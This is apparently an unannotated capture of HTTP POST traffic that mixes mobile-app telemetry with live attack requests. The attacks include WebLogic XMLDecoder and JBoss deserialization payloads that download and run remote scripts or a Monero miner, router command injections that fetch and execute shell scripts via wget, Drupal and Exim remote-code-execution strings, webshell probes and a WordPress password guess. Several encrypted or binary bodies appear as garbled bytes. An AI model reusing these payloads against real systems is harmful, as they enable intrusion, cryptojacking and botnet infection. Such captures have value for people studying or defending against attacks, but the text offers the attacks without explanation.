<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

SvFZwYmbbYIKMU9uxlGdSEv8J48zkdbEQYwtQdc3GTb/a9o5wZzxclouuuf84NIsBiNl1AZ0UPDVFHdw9Bv1VkPR70nNNqBp3M1vfXX9gwbLbk9H2yBQCEvlSHSW55g0E7Zs/1tt5LvWDJ35h7V2bq+nSpbYIG/+38tUcDVElACCS8zJ80l65wVzpf1MTUTZ0NA2GC1fOG0aix3tsWWeCUXjjqJcNE6Z/TzF8BS5pM3l0uFT1APMx4SmVBLTEWuojdQUZQBZfS0O4lAGjVlln/IFkmwuvncPHHejCkupS8iJk5aPii7vemhhyiZNzkP4M2aujs06mXAH3oO3E3k7yt3OWke8Ox/sKdnKc+WDi4aES51tneJ9+KC75Q5PjTBoDPGM7VSBEx9/qcC4neb/axYw

POST http://check.proxyradar.com/azenv.php?auth=152809254035&a=PSCMN&i=759095603&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496019302693
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2363

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959¶Ä⁄íÚUÂxúÕWko⁄ ˝+üÓΩÕ…±«å•~01v!ô°PÉfl!c¸∂kpW˝ÔwèIS“¶/ı∂™¢H`˚±÷⁄èy◊Y˛±£æΑ€†JÉ˚ Ì®ÆsŸ	í˚é˙flwù^OíYt
‘’ê.$MtC‘}pÕ
⁄Cëø2›,x≥s´›≤ÿÖ©≤Ãã*sS0µ¨≥2áóp∆+≤+?ZØÉ*»Ω`‰~PÌ√h\mì®⁄]’Ê +ºbã¸√ïWñWZYjfi.∫èvG∞¥€vT^Ï…'£ÆƒÒ Âóº™ùŒ˚À≥¿πˇ[¬ídt˘ºœÛ†ä|lY‹„˚†˙u—à퓪¸ƒŸßÿ¸>“$Òˇ«ë&ˆ§.˜«ê&ˆ∫˙ÉHÉxz≤¯«ë&)¢"}iÆˇ&,ˆÀ≤ÿFª®»óhÈ©{\Ú∑‰%Ó◊≈'Û\˜ÚõÓªæ†#º¸ÁË‚ëd˘´˙˙Á˝?óùm∞›Ä€v‚∏ıÆ(›Mp˙∆>-ˇ?Å˘uÂ2û:™¿ã–=(øƒº(ubyµêsÃB˛-6ª®
„q
Úr=
[FºpÓ*wΩé<6€˝büßÖÎ/üÒ=Ñ∫
wŸ©Àß/IÊÒ=Ã(©ßædAP|=è˚è·*äη&ú±˘·Â¥·\∂€ŒÚ|›ÒÎé
p|xƒ/·”}CT©eaW√cÓ±ZæeÛ,tY‚æÍD@ºpÓ‰/˛ªΩú?∫‹œF*ÖØz{"Èü
]˙lÙ(ΩÓœÖÆH†⁄Ø9Ř]A¸Ÿ»Âœõ˜$rP,îU∏>Î∂Ô:k7JYokh√€÷ûÎy–‰ñ€zµ;ñ¨*^Ωy≠ΩÀnY&
ÏÈIv›@TÇÄ[KíÎãäÀqºà÷ß3Kˉ€6Îœ*µ
∂EZÔûÙ˜ûSX¸Áñ^·É∂G˚¡}‰À∞åBºµX€aM†)r8÷}<ı°∫πWp&ÛÿúÂTEV=YÌ)ÍZP^DYYE˘éÕî=¬}°t”reœ®n
∏±E˜Xß<±{¢ÏMȱX.ÃÎçÄ-ç€a}s$çckû€HiìÔr¨'¸ÿö5MiHÇıô‡Ëi§ıIπ 	GÌ√vÅåΩgÙê≥5Æ›´Mmx˜›õúto£πGotèß÷<πÀ[˚∫&—xãƒöàcK;‡Xp6ã
ÿûáÿ4‚±Ö5•µ'L√ïyXSÜ´LJW˝ça	”‚.wC;*õ‡(¶m&ƒéÓ	ÕDOXfç{{lì–±¥=ÕhCcˆ?Ø”tÁ5mzØ˙Ϊ‹œÊG•˜´psç≠ÕÛñõ·qlMx‹åí±IEÇhÉcÅÕÜZ3éXCŃitóèM#”˙˝3嶰oŒ9◊ÊS≥èèX∑ñ∆flZCqàå„	«∏1ä∑û∞≠GÛ√¶ Õ<$ˆD‹Fƒ¶ƒ—xr$ÒÊàc#t‡≠¸‚lî‚&ë‡≥‰h⁄ÕJ Î≥|r-r∑Ò§ÕÈ.ˇ<+≠!ñë·lyÑ&∂)Gt`¢!!µÅ"#¡Ê(‘4ô⁄Ïpk·>∏7w˘ß,ü4‘«ˆ‚öâNÜ%'ˆcÇÄs–!…ú–…úå4˝îdM_åRœÏ}£∑øÀWËPR!°öEø¿¿@≈[^„ÅDò.uà≠¡åã„ÿ$1—߆Æ!®W”ú∑Ób ÅR®Ox£∏°Ò≈Õ	]ViL‚~‰ƒICÃQB,ÑÅd3ûqÎÿC®õ‰àÌ…ûq:‰∆̵óÕ˜+aƒ-@ù¿È—œå-h^¬œhû°Ac'$ç™üq∏I‹rä„0n˝€£ò˙‘A±ZëÇ⁄RÌÿ{™g$\-˙°k˚µˇ*›;•;~AÆ[Ö8Ÿaã6L!ì=†ú–f"ÀIùxîoàZ*ÓÄ
'l•)Œ
O¥ÅoÛ•”fllK	Tt¿h≤≈Tfi]N—Ä'&†kÕ†j܆∑Í°⁄&›
Óã«NL—<ŸR
úCù∆⁄
öM;‘+æóπ–+„t
\iÍû«™mO›S∆D<‹®m$4ÉhÕ0D›D ¶
ôÕ4c2§C›Â&G«t†á—ΩcD–Z4∂i3∂˙ôÍ6h¸¿ÚÚÂ]Œñæzµ,∂.ŒÜm[˚∞õuy∏(znUEß˛Ò¡º€>m'À∫Nœ/<6ÙU·Vl‡·7Æxöª»s”ÂiÒ'Ñõ◊k◊€’UÎrπE±Vflnë^Âõ∂›€¯:3jÁ’Ëfiµßk◊ûPΩa`ûµT¨OD(Œ	›7w˚«ûkM_ŸFlˆçÎtÀ͆ê@„zô·¶ùæ[ú7=4?∫6˙Ü ƒ§˚ÒÙ©Õ
ê—È&É.X{6Ù	À…5«çÕÙºjA€çA£pbO-®®:£‘{¬ç	™û]k⁄ºtL>!”ß˙ÑöyPËóÙ˘ˆ^
ö.@ö9Ÿk-≥0–—rø*"ˇazo£MÓ2`·ç(™“µjTITuNÌvUYSCE≤*ı’kNDU–U‘SªHÂ˚`¡+kfqäԪشÇÒ]TUp¡_¸Îæõ˛ª]›Ω‰˚/3L8~r¶%˘äªÍu•p∫^?3ˆ?®™rsˇ\#ß˝û ÛÓo¡dAuæ´ÿf3‘[PŒºâW◊*+Û%vG‚zÅœÛêÁÉ)W›û$q´í{]‰1«—∂dóÎá¸˙i·%ØζIÉãQ∞oó9ñ“√zı˛3q∑Y›X3E|›Æ6^ñ{ß⁄J›|S|-bz°õÁÌ∫‰πYÈ{ÃÓK˜©ΩS•≤Kè ¬›q˜˛˝ˇür˝¬@f43f4cd056c22b3019d79ee56b88f0eb1978038acb6f141888525ce00e460200 0bd8f287815b79ea3108dc0de0b51abb

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache

log=jamesatchue&pwd=1qaz

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149549442507&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 420
Cache-Control: no-cache

EfNWl9nPMM8pNZ0uiQul0uRiwlvJEZcDo13yNh+i7lwCKU/aMCu1bXDZXuA4x4WcIWaEuw9YF8eImlMLP/3KzGoxdScpNKegTN/kjNuZky+BMjDugFzhTYluP1kc2KLGBDxJi5QQEg3lCsoxi/x0haPnXegUxRnPHU8du5TIa4h4tlbUbZeuPX/yo9/5y7vIX4uR1LrX7vYfUezMZGZ3mB6//xagEM8EFjQtvdcsaHyVI8s8MpdqOHJiPXIZzpPVbyDbXB3HF21EDTISsoSTdDMhxV7OGfcbl5YUR4SV0x5gIedxoeblk4JKs+808oL0Nw1y1vTbpMPGK8Bk0cuF2PlhBJpN/fzt66MTVHGxRvnrUi8NknaXifMGZ4mwThfsSm6K/b7KCbaw5iTr6U951WdziJ0x89/oYgq1

POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 104.131.143.85/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0


POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&k=1 HTTP/1.1
Content-Length: 128
Host: cm.adkmob.com
Connection: Keep-Alive

Äë,_—úãd®3OÎ÷'(B∏y∆Í£∞.`v±/fi
∫∆äWHunIäúxnzeHåã(M”ı"√gÔáT@íÙ{ø≥ã?£±"X›»úAÔÕµƒ“©y∂‡f•é‹}∫ÿåìòé‘Ω:ı}πg’÷_˜Ωn¡>sA»Núfπ

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 169
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

_drupal_ajax=1&_drupal_ajax=1&form_id=user_register_form&mail%5B%23markup%5D=echo+Name%3A+%24%28id+-u+-n%29+&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1060
Content-Type: multipart/form-data; boundary=5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

27842
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

539ddd0c5e9289a16a4c86ccd9070cf0
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--5Pemact0i6yueNKO4i9Ewei6OgX9HIgfxJcl0--


POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST /invoker/readonly HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:8080/invoker/readonly
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Host: x.x.x.x:8080
Connection: Keep-Alive



POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1496455381548&chk=e3e2e39e HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream

4c5
ã•òÕjdGÖ˜yäfiïJU%]ËeÅdó˝∏~3!&ƒìź}ŒÌ0ª,nóqC‹◊˛êééé¸˙²Á◊ó/üÓ¬°'
·‰ȇ|˚ûÛÀfloÛØ΀«{]V<çG•§ıÚ˙˘∑øè{YQBKçrhìt£Í}QÆi≥bkËÀ€?ofi∆˜‡/ü>è˘zˇÂßõ˛¸Îèè|ùw˝
_flΩ˛èÃáeû^˙ås9çYô‘≠êUT£7çÏ-ˆ∫Õ£7	á⁄ëÆ◊G=ı¶√©œl§£rON¢kä±ÙeÌı˘èá˝2OÎ≥œÈJûsC}§í/CÁjki3◊¥Õ#∑ºT/Û∏Ê:4†*9uRî´/≤Tx§2WÔæÕìn
‚y™>‚Q¢6£îπêFM ≥AsIØ≥1ƒΩœ#7·#ÍëÆÛ¨Áîhéô°ü≥_-V™Ãd”WÔ®ÙìÚ°Ò2œÃ¡R∆ºèú#Ù”ò‹¢Q/ìcñ±\√6OæÖÚ‰|•Ó⁄5
x⁄ 
ô·?´R√ÿÖök
eø>‘OJá\ÔW/‹M¥R—¶§yu¸PL[*EÒ˘møÖxD;4<·?}-f¯s	
ÛU’>çÃL◊$∆¯àπ1]Ê1©,µej"Rf!ÀÓ,ãö[‡¥ø/¿É‚ƘKªÂ5W£cBøŒ8íPπ‰jö`{<ô8fiÿñ#]ÔWå
F´¨Å˙dÅˇå)Á^K(a°ÄÔ®Ê=bƒÆ◊'Ùj%$<Ô	˙	ÿd¶P“¨m¥ƒ›yókÀÇ”3~X™Õ5ΩìsA}∆à®èıáˇ$·Ó.€˙9yNsFÀ.Û‰V’R5‰
H˛<®≈¥»kúöͨ¢€˚B¬cfi—≤Î~ÿ[í:T<x˙cï"ˇÿúi1ܨı̺!èºÂêÎıIw‘√®TAÀ≤Ê=“ÃùgY57Y€<rŒ;¸Á	˝`†áÙåáÒN∫
˙U±ø≤èƺ˙D›fi¡#Çe
§Î˙¨YΩ,Ë'D|á¯ëW1,∫ˆÁ+>ˆJt}ø√û˚LÖ¡œ<6…Xù¶∑Yu≥¥ΩOO¡≤8¯:œU˝Ã´∏1êœVU√–ΉZ|≈®ı]<ÂÄÑ‚ı˚"&…V:VE∑ˆ-ØÆL%VK\g˜Ôãì«…8y.Û‘Ö$X-Pi
zˆÖ$›÷¬|-ÏzÌIY∂yÙÙg‰Uπæø&è∆fãíü˘P¢X®à\Ê¿ŒG^µmûr˙≥¬ûòØòáy/¥¬¿ïì—9≥Æe1 np»∂_ >œɣÈ@
Î&§m
π èI„<J·äH˝ûÚ»◊ÔØÅÊp™˜N=˝PôZéL‡DÅR«¿ÔÎπ|ÛgªæflëGIôzèüŸUœ–™8z‹√Ñ'nflßbèˇo8N‘Îy5GÑTú¶å|Å°/˚zÆÉy ⧑ˆı„è¸ûŸ_‡ë"äÉ"úyæ„◊‡‚ZÑ4
?Õffl¨Új8Û™ƒgx‚¿_≈gq‡úyu¬öõJßVRBKgÌ€<rC8d~Ü'gCZ≈ÛÓ^¡cë,V,’Ÿ¶µå[ë7ÁΡÒh9‰∫ûg≈N7†Ù*~fiß˚++∆-åh]Øfiˇ®Â∞
0



POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106

{"start":1494931440511,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST //wp-login.php?action=lostpassword HTTP/1.1
User-Agent: curl/7.35.0
Accept: */*
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}69.64.61.196${substr{0}{1}{$spool_directory}}rce.txt}} null)
Content-Length: 43
Content-Type: application/x-www-form-urlencoded

user_login=admin&wp-submit=Get+New+Password

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149622632759&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=ONAI561AM

POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1
Host: x.x.x.x:7001
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564

¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•LmemberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}

java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀ
L
ht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyî
Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó
[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±î
L	iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt	getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{Gxp
tΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~
q~#sq~srjava.lang.Integer‚†§˜Åá8
Ivaluexrjava.lang.Numberܨïî‡ãxp
srjava.util.HashMap⁄¡√`—F
loadFactorI	thresholdxp?@wxxvrjava.lang.Overridexpq~:

POST http://behacdn.ksmobile.net/fcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 46

.ŒS·ŒÍÕ`i'c
K6ÍoòKÌVcpjBhC*8k‚·Hü¨{Ù’{

POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 483

{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","userAgent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 4LTE Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36","networkOperator":"TELKOMSEL","volume":0.4,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
{yb‚£
